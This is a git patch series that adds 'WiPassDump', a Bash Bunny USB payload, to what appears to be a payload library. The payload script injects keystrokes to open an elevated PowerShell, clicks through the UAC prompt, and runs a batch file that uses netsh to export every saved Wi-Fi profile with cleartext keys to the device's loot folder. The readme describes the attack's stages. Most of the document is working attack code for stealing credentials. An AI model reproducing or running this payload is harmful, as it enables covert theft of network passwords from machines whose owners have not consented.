From c10328832034d3916c424ff934e5713bc12db859 Mon Sep 17 00:00:00 2001 From: samdeg555 Date: Sun, 12 Mar 2017 12:24:28 -0400 Subject: [PATCH 1/4] WiPassDump Runs powershell as Administrator, bypasses UAC and dumps cleartext Wi-Fi passwords and infos to the Bash Bunny. --- payloads/library/WiPassDump/a.cmd | 6 +++ payloads/library/WiPassDump/payload.txt | 55 +++++++++++++++++++++++++ payloads/library/WiPassDump/readme.md | 26 ++++++++++++ 3 files changed, 87 insertions(+) create mode 100644 payloads/library/WiPassDump/a.cmd create mode 100644 payloads/library/WiPassDump/payload.txt create mode 100644 payloads/library/WiPassDump/readme.md diff --git a/payloads/library/WiPassDump/a.cmd b/payloads/library/WiPassDump/a.cmd new file mode 100644 index 0000000..858b01e --- /dev/null +++ b/payloads/library/WiPassDump/a.cmd @@ -0,0 +1,6 @@ +REM Go to dump directory +cd /d %~dp0 +cd ../../loot/WiPassDump/ + +REM Dump saved Wi-Fi infos +netsh wlan export profile key=clear \ No newline at end of file diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt new file mode 100644 index 0000000..6a25411 --- /dev/null +++ b/payloads/library/WiPassDump/payload.txt @@ -0,0 +1,55 @@ +#!/bin/bash +# +# Title: WiPassDump +# Author: Dax +# Version: 1.0 +# Target: Windows +# +# Runs powershell as Administrator +# Bypasses UAC +# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny +# + +LED R 200 + +ATTACKMODE HID STORAGE + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +# Set language accordingly +Q SET_LANGUAGE ca + +# Create directory to dump infos +mkdir -p /root/udisk/loot/WiPassDump + +LED B 200 + +# Launch powershell as admin +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell -Verb runAs +Q ENTER + +# Bypass UAC +Q DELAY 3000 +Q ALT o +Q ENTER +Q DELAY 500 + +# Start a.cmd +Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' +Q STRING $SWITCH_POSITION +Q STRING '/a.cmd'"'"')' +Q ENTER + +# Wait for a.cmd to finish and exit +Q DELAY 3000 +Q STRING exit +Q ENTER + +LED R B 500 +sync +ATTACKMODE STORAGE + +LED G \ No newline at end of file diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md new file mode 100644 index 0000000..b744bf0 --- /dev/null +++ b/payloads/library/WiPassDump/readme.md @@ -0,0 +1,26 @@ +# WiPassDump for Bash Bunnys + +* Author: Dax +* Version: Version 1.0 +* Target: Windows + +## Description + +Dumps saved Wi-Fi infos including clear text passwords to the bash bunny +Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. + +## Configuration + +None needed. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Setting up | +| Blue (blinking) | Attack running | +| Purple (blinking) | Almost done (cleaning up) | +| Green | Attack Complete | + +## Discussion +None yet. \ No newline at end of file From 9723480f9b3a91d13a32d90699bd7c81d2c575d5 Mon Sep 17 00:00:00 2001 From: samdeg555 Date: Sun, 12 Mar 2017 12:26:07 -0400 Subject: [PATCH 2/4] Update payload.txt --- payloads/library/WiPassDump/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt index 6a25411..68830e8 100644 --- a/payloads/library/WiPassDump/payload.txt +++ b/payloads/library/WiPassDump/payload.txt @@ -1,7 +1,7 @@ #!/bin/bash # # Title: WiPassDump -# Author: Dax +# Author: samdeg555 # Version: 1.0 # Target: Windows # @@ -52,4 +52,4 @@ LED R B 500 sync ATTACKMODE STORAGE -LED G \ No newline at end of file +LED G From cb0948a56e28e43404b869d9213d5754af94e041 Mon Sep 17 00:00:00 2001 From: samdeg555 Date: Sun, 12 Mar 2017 12:26:36 -0400 Subject: [PATCH 3/4] Update readme.md --- payloads/library/WiPassDump/readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md index b744bf0..72412ab 100644 --- a/payloads/library/WiPassDump/readme.md +++ b/payloads/library/WiPassDump/readme.md @@ -1,6 +1,6 @@ # WiPassDump for Bash Bunnys -* Author: Dax +* Author: samdeg555 * Version: Version 1.0 * Target: Windows @@ -23,4 +23,4 @@ None needed. | Green | Attack Complete | ## Discussion -None yet. \ No newline at end of file +None yet. From b0a130f96ae1bab28b0e785ea83118f8508e8619 Mon Sep 17 00:00:00 2001 From: samdeg555 Date: Sun, 12 Mar 2017 12:52:56 -0400 Subject: [PATCH 4/4] Update payload.txt --- payloads/library/WiPassDump/payload.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt index 68830e8..c141d94 100644 --- a/payloads/library/WiPassDump/payload.txt +++ b/payloads/library/WiPassDump/payload.txt @@ -12,7 +12,8 @@ LED R 200 -ATTACKMODE HID STORAGE +# Create directory to dump infos +mkdir -p /root/udisk/loot/WiPassDump # Source bunny_helpers.sh to get environment variable SWITCH_POSITION source bunny_helpers.sh @@ -20,8 +21,7 @@ source bunny_helpers.sh # Set language accordingly Q SET_LANGUAGE ca -# Create directory to dump infos -mkdir -p /root/udisk/loot/WiPassDump +ATTACKMODE HID STORAGE LED B 200 @@ -44,12 +44,13 @@ Q STRING '/a.cmd'"'"')' Q ENTER # Wait for a.cmd to finish and exit + +LED R B 500 + Q DELAY 3000 Q STRING exit Q ENTER -LED R B 500 sync -ATTACKMODE STORAGE LED G